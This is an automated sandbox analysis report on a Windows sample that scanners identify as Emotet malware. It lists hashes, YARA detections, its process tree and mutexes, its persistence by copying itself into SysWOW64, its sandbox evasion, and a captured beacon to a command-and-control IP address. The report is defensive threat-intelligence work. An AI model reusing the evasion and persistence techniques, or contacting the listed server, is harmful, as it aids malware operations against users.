Play interactive tour

Edit tour

Analysis Report vEjGZyD0iN.exe

Overview

General Information

Sample Name:	vEjGZyD0iN.exe
Analysis ID:	387710
MD5:	ecbc4b40dcfec4ed1b2647b217da0441
SHA1:	e08eb07c69d8fc8e75927597767288a21d6ed7f6
SHA256:	878d5137e0c9a072c83c596b4e80f2aa52a8580ef214e5ba0d59daa5036a92f8
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Emotet

Drops executables to the windows directory (C:\Windows) and starts them

Found evasive API chain (may stop execution after checking mutex)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for sample

Contains capabilities to detect virtual machines

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files to the windows directory (C:\Windows)

Found large amount of non-executed APIs

IP address seen in connection with other malware

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Yara signature match

Classification

Startup

System is w10x64

vEjGZyD0iN.exe (PID: 7056 cmdline: 'C:\Users\user\Desktop\vEjGZyD0iN.exe' MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)

vEjGZyD0iN.exe (PID: 7084 cmdline: C:\Users\user\Desktop\vEjGZyD0iN.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)

lookupcart.exe (PID: 3832 cmdline: C:\Windows\SysWOW64\lookupcart.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)

lookupcart.exe (PID: 644 cmdline: C:\Windows\SysWOW64\lookupcart.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)

svchost.exe (PID: 4792 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6564 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
vEjGZyD0iN.exe	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
vEjGZyD0iN.exe	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 40 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 40 00 85 C0

Memory Dumps

Source	Rule	Description	Author
00000001.00000000.326121826.0000000000981000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000006.00000002.404026613.0000000000981000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000004.00000002.334582341.0000000000981000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000002.00000000.327122709.0000000000981000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000002.00000002.335148697.0000000000981000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000006.00000000.334160361.0000000000981000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000004.00000000.333230150.0000000000981000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.0.vEjGZyD0iN.exe.980000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.0.vEjGZyD0iN.exe.980000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 98 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 98 00 85 C0
1.0.vEjGZyD0iN.exe.980000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
1.0.vEjGZyD0iN.exe.980000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 98 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 98 00 85 C0
6.0.lookupcart.exe.980000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
6.0.lookupcart.exe.980000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 98 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 98 00 85 C0
1.2.vEjGZyD0iN.exe.980000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
1.2.vEjGZyD0iN.exe.980000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 98 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 98 00 85 C0
4.0.lookupcart.exe.980000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
4.0.lookupcart.exe.980000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 98 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 98 00 85 C0
4.2.lookupcart.exe.980000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
4.2.lookupcart.exe.980000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 98 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 98 00 85 C0
6.2.lookupcart.exe.980000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
6.2.lookupcart.exe.980000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 98 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 98 00 85 C0
2.2.vEjGZyD0iN.exe.980000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.vEjGZyD0iN.exe.980000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 98 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 98 00 85 C0
Click to see the 11 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: vEjGZyD0iN.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: vEjGZyD0iN.exe	Virustotal: Detection: 86%			Perma Link
Source: vEjGZyD0iN.exe	ReversingLabs: Detection: 96%

Machine Learning detection for sample

Show sources

Source: vEjGZyD0iN.exe

Joe Sandbox ML: detected

Source: vEjGZyD0iN.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: vEjGZyD0iN.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: Joe Sandbox View

IP Address: 79.172.249.82 79.172.249.82

Source: global traffic

HTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 79.172.249.82:443Content-Length: 436Connection: Keep-AliveCache-Control: no-cacheData Raw: 23 69 5d 58 20 f6 64 09 28 5b a9 4c 38 7e b6 f2 94 d0 14 cf 6f 25 39 c5 a1 11 49 f8 4c 0d 98 ca 13 46 0d 2d 27 fa 14 33 7a 63 0e 6f d0 51 e6 17 e5 2d 70 05 3d 55 4b 0a 09 0e 1b 99 f1 26 2c a5 bd af 4f f5 8a 78 af 49 3d e1 ee bf 07 04 ca 18 6c 44 b3 ad 3b 56 c3 20 0f 48 39 79 89 3b 23 32 65 79 9d 05 16 45 e6 8b 45 3d f9 21 58 a5 da 47 cc 17 fc 26 70 77 3e 04 b4 40 07 01 8a f5 e3 27 a6 78 4d 7e e9 96 86 c7 6e 1a 55 40 cd f4 62 6a 3e 68 57 70 ae c5 ec f7 12 67 ba ab 40 8e 94 d6 3f 19 f6 61 a2 06 93 f4 15 0f 17 00 05 5a fe 5d c1 b8 e3 26 4c 93 7e 4b 11 10 f2 8f 24 6c 38 41 39 76 ec 1a 38 2c 43 90 fa 66 a8 a0 f4 a1 69 a6 ad 1e 28 fa 89 07 3e da ed 3a 85 27 2c 72 0e c2 34 23 1c 68 87 cc f5 be 42 31 c9 20 dd 6b 3c 89 4c f2 43 a4 41 b7 5c 96 99 29 bb 9d 86 72 5e 86 c7 c5 a3 b1 fb 10 4f 0c 26 54 18 16 2c 68 f7 57 65 21 6a 38 46 34 6d c9 06 4b 2a ae b4 cd 83 59 e1 52 7f a4 bc ec 3e 24 5b 75 02 7e eb 7d b2 e6 a2 af e4 19 36 e2 e2 6f f1 03 3d 1b 34 2e ad 99 c8 0d 8d e5 19 d5 a7 52 f4 e7 54 48 ed dd 91 d4 20 72 1a 59 94 6c b7 df 9d d8 47 9d 49 6c 94 2a d4 a5 70 87 5d 7c 2e 63 b8 3e c9 48 52 3b 04 30 03 56 d2 91 4c 8d e1 96 a3 9a 39 a5 ba 45 25 49 4f 64 9f 6d 78 3e 71 95 92 af e5 f9 55 21 d7 e5 89 3d e7 f6 53 01 a0 c6 4e 24 e3 68 d7 a8 73 80 21 7d 87 07 0a f1 3f f2 a0 e5 e0 a4 a4 34 c9 ec 43 4a 12 ac Data Ascii: #i]X d([L8~o%9ILF-'3zcoQ-p=UK&,OxI=lD;V H9y;#2eyEE=!XG&pw>@'xM~nU@bj>hWpg@?aZ]&L~K$l8A9v8,Cfi(>:',r4#hB1 k<LCA\)r^O&T,hWe!j8F4mK*YR>$[u~}6o=4.RTH rYlGIl*p]|.c>HR;0VL9E%IOdmx>qU!=SN$hs!}?4CJ

Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82

Source: unknown

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: vEjGZyD0iN.exe, type: SAMPLE
Source: Yara match	File source: 00000001.00000000.326121826.0000000000981000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.404026613.0000000000981000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.334582341.0000000000981000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.327122709.0000000000981000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.335148697.0000000000981000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.334160361.0000000000981000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.333230150.0000000000981000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 2.0.vEjGZyD0iN.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.vEjGZyD0iN.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.lookupcart.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.vEjGZyD0iN.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.lookupcart.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.lookupcart.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.lookupcart.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.vEjGZyD0iN.exe.980000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: vEjGZyD0iN.exe, type: SAMPLE	Matched rule: Emotet Payload Author: kevoreilly
Source: 2.0.vEjGZyD0iN.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 1.0.vEjGZyD0iN.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 6.0.lookupcart.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 1.2.vEjGZyD0iN.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 4.0.lookupcart.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 4.2.lookupcart.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 6.2.lookupcart.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 2.2.vEjGZyD0iN.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly

Source: C:\Windows\SysWOW64\lookupcart.exe

File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache

Jump to behavior

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

File deleted: C:\Windows\SysWOW64\lookupcart.exe:Zone.Identifier

Jump to behavior

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe	Code function: 1_2_009877F0		1_2_009877F0
Source: C:\Users\user\Desktop\vEjGZyD0iN.exe	Code function: 1_2_00986E70		1_2_00986E70

Source: vEjGZyD0iN.exe, 00000002.00000002.335820023.0000000002A90000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs vEjGZyD0iN.exe
Source: vEjGZyD0iN.exe, 00000002.00000002.335922760.0000000002AF0000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs vEjGZyD0iN.exe
Source: vEjGZyD0iN.exe, 00000002.00000002.335922760.0000000002AF0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs vEjGZyD0iN.exe

Source: vEjGZyD0iN.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: vEjGZyD0iN.exe, type: SAMPLE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 2.0.vEjGZyD0iN.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 1.0.vEjGZyD0iN.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 6.0.lookupcart.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 1.2.vEjGZyD0iN.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 4.0.lookupcart.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 4.2.lookupcart.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 6.2.lookupcart.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 2.2.vEjGZyD0iN.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload

Source: classification engine

Classification label: mal88.troj.evad.winEXE@8/0@0/1

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

Code function: 1_2_00982110 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

1_2_00982110

Source: C:\Windows\SysWOW64\lookupcart.exe	Mutant created: \BaseNamedObjects\M6ED6084C
Source: C:\Users\user\Desktop\vEjGZyD0iN.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\M46DB9CB6
Source: C:\Users\user\Desktop\vEjGZyD0iN.exe	Mutant created: \Sessions\1\BaseNamedObjects\MFDF2F994
Source: C:\Users\user\Desktop\vEjGZyD0iN.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\I46DB9CB6
Source: C:\Windows\SysWOW64\lookupcart.exe	Mutant created: \BaseNamedObjects\Global\I46DB9CB6

Source: vEjGZyD0iN.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: vEjGZyD0iN.exe	Virustotal: Detection: 86%
Source: vEjGZyD0iN.exe	ReversingLabs: Detection: 96%

Source: unknown	Process created: C:\Users\user\Desktop\vEjGZyD0iN.exe 'C:\Users\user\Desktop\vEjGZyD0iN.exe'
Source: C:\Users\user\Desktop\vEjGZyD0iN.exe	Process created: C:\Users\user\Desktop\vEjGZyD0iN.exe C:\Users\user\Desktop\vEjGZyD0iN.exe
Source: unknown	Process created: C:\Windows\SysWOW64\lookupcart.exe C:\Windows\SysWOW64\lookupcart.exe
Source: C:\Windows\SysWOW64\lookupcart.exe	Process created: C:\Windows\SysWOW64\lookupcart.exe C:\Windows\SysWOW64\lookupcart.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\vEjGZyD0iN.exe	Process created: C:\Users\user\Desktop\vEjGZyD0iN.exe C:\Users\user\Desktop\vEjGZyD0iN.exe	Jump to behavior
Source: C:\Windows\SysWOW64\lookupcart.exe	Process created: C:\Windows\SysWOW64\lookupcart.exe C:\Windows\SysWOW64\lookupcart.exe	Jump to behavior

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: vEjGZyD0iN.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

Code function: 1_2_00981F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,

1_2_00981F40

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\SysWOW64\lookupcart.exe

Executable created and started: C:\Windows\SysWOW64\lookupcart.exe

Jump to behavior

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

PE file moved: C:\Windows\SysWOW64\lookupcart.exe

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

File opened: C:\Windows\SysWOW64\lookupcart.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\SysWOW64\lookupcart.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\lookupcart.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\lookupcart.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\lookupcart.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)

Show sources

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_1-12617

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

API coverage: 6.4 %

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: svchost.exe, 00000007.00000002.363918563.000001979E140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.404389450.000002328DC70000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000007.00000002.363918563.000001979E140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.404389450.000002328DC70000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000007.00000002.363918563.000001979E140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.404389450.000002328DC70000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000007.00000002.363918563.000001979E140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.404389450.000002328DC70000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\lookupcart.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

Code function: 1_2_00981F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,

1_2_00981F40

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

Code function: 1_2_00981BE0 mov eax, dword ptr fs:[00000030h]

1_2_00981BE0

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

Code function: 1_2_009815B0 GetModuleFileNameW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,CreateEventW,CreateMutexW,CloseHandle,GetLastError,SetEvent,CloseHandle,CloseHandle,memset,CreateProcessW,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,CloseHandle,

1_2_009815B0

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\lookupcart.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

Code function: 1_2_00988D50 RtlGetVersion,GetNativeSystemInfo,

1_2_00988D50

Source: C:\Windows\SysWOW64\lookupcart.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: vEjGZyD0iN.exe, type: SAMPLE
Source: Yara match	File source: 00000001.00000000.326121826.0000000000981000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.404026613.0000000000981000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.334582341.0000000000981000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.327122709.0000000000981000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.335148697.0000000000981000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.334160361.0000000000981000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.333230150.0000000000981000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 2.0.vEjGZyD0iN.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.vEjGZyD0iN.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.lookupcart.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.vEjGZyD0iN.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.lookupcart.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.lookupcart.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.lookupcart.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.vEjGZyD0iN.exe.980000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API11	Path Interception	Process Injection1	Masquerading12	OS Credential Dumping	Security Software Discovery21	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol12	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Hidden Files and Directories1	NTDS	File and Directory Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	File Deletion1	LSA Secrets	System Information Discovery14	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
vEjGZyD0iN.exe	87%	Virustotal		Browse
vEjGZyD0iN.exe	97%	ReversingLabs	Win32.Trojan.Emotet
vEjGZyD0iN.exe	100%	Avira	TR/Crypt.XPACK.Gen
vEjGZyD0iN.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.0.vEjGZyD0iN.exe.980000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.0.lookupcart.exe.980000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.lookupcart.exe.980000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.vEjGZyD0iN.exe.980000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.vEjGZyD0iN.exe.980000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.lookupcart.exe.980000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.0.lookupcart.exe.980000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.vEjGZyD0iN.exe.980000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://79.172.249.82:443/	3%	Virustotal		Browse
https://79.172.249.82:443/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://79.172.249.82:443/	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
79.172.249.82	unknown	Hungary		43711	SZERVERNET-HU-ASHU	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	387710
Start date:	15.04.2021
Start time:	14:42:24
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	vEjGZyD0iN.exe
Cookbook file name:	default.jbs
